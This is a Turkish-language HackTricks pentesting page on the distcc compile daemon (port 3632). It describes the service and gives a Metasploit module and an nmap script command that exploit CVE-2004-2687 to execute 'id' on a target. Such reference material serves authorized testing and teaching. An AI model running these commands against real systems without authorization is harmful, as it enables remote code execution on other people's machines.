hacktricks/network-services-pentesting/3632-pentesting-distcc.md

2.3 KiB
Raw Blame History

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:

Temel Bilgiler

Distcc, ağdaki diğer bilgisayarların boş işlem gücünü kullanarak derleme sürecini geliştiren bir araçtır. Bir makinede distcc kurulduğunda, bu makine derleme görevlerini başka bir sisteme dağıtabilir hale gelir. Alıcı sistem, gönderilen kodu işlemek için uyumlu bir derleyiciye sahip olmalı ve distccd daemon'ı çalıştırmalıdır.

Varsayılan port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Sömürü

CVE-2004-2687'ye karşı savunmasız olup olmadığını kontrol edin ve keyfi kod yürütmeyi deneyin:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Bu servisi Shodan'ın tespit etmediğini düşünmüyorum.

Kaynaklar

Oluşturan: Álex B (@r1p)